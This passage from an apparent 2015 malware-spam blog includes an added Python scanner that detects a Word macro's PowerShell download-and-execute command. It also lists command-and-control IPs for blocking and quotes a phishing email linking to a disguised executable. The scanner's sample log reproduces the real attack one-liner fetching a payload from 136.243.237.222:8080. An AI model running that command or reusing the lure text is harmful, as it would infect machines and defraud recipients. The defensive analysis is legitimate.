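As an added defender-side example (my code, not anything from the post), a small Python scanner that matches the macro's download-and-execute one-liner in process-creation command lines, pulls out the download host and the dropped path, and turns the hits into a host:port blocklist. The pipe-separated log format and the sample lines are constructed for the example; the first sample reuses the command line from the deobfuscated macro.

```python
import re
from urllib.parse import urlparse

# Shape of the download-and-execute one-liner the deobfuscated macro runs:
#   cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('<url>','<path>');Start-Process '<path>';
DOWNLOAD_EXEC_RE = re.compile(
    r"powershell(?:\.exe)?\b.*?\(\s*new-object\s+system\.net\.webclient\s*\)\s*\.downloadfile\(\s*"
    r"'(?P<url>[^']+)'\s*,\s*'(?P<path>[^']+)'\s*\).*?start-process\s+'(?P<exec>[^']+)'",
    re.IGNORECASE)

def match_download_exec(cmdline):
    """Return URL, host, port and dropped path when cmdline has the pattern, else None."""
    m = DOWNLOAD_EXEC_RE.search(cmdline)
    if not m:
        return None
    parsed = urlparse(m.group("url"))
    return {"url": m.group("url"), "host": parsed.hostname,
            "port": parsed.port or (443 if parsed.scheme == "https" else 80),
            "dropped": m.group("path"),
            # only a true download-and-execute when the started file is the downloaded one
            "executes_download": m.group("path").lower() == m.group("exec").lower()}

def scan_process_log(lines):
    """One finding per process-creation line that launches the file it downloaded.
    Constructed log format (no real product's): <timestamp>|<parent image>|<child image>|<command line>"""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4:
            continue  # malformed line: skip it rather than abort the scan
        hit = match_download_exec(parts[3])
        if hit and hit["executes_download"]:
            hit.update(ts=parts[0], parent=parts[1].rsplit("\\", 1)[-1].lower())
            findings.append(hit)
    return findings

def blocklist(findings):
    """Deduplicated host:port pairs to feed a proxy or firewall blocklist."""
    return sorted({f"{f['host']}:{f['port']}" for f in findings})

# Constructed sample lines; the first reuses the deobfuscated macro's command line from the post.
SAMPLE_LOG = [
    "2015-02-11T09:20:01|C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE|C:\\Windows\\System32\\cmd.exe|"
    "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\\pJIOfdfs.exe');Start-Process '%TEMP%\\pJIOfdfs.exe';",
    "2015-02-11T09:21:14|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\scripts\\inventory.ps1",
    # DownloadFile without Start-Process: fetches a file but does not run it, so it is not flagged
    "2015-02-11T09:22:30|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/readme.txt','C:\\Temp\\readme.txt')",
]
```

Running `scan_process_log(SAMPLE_LOG)` flags only the WINWORD-spawned line and `blocklist` reduces it to 136.243.237.222:8080, the same host the post recommends blocking.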
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
Tuesday 10 February 2015
Malware spam: "Megtrade groups [venkianch@gmail.com]" / "RE: Purchase Order Copy"
This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@gmail.com]
Reply-To: venkanch@gmail.com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd
Download Attachment As zip
Unusually, this email does not appear to be sent out by a botnet but has been sent through Gmail. The link in the email goes to www.ebayonline.com.ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named (1) Purchase Order Copy.pdf ___________________ (2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.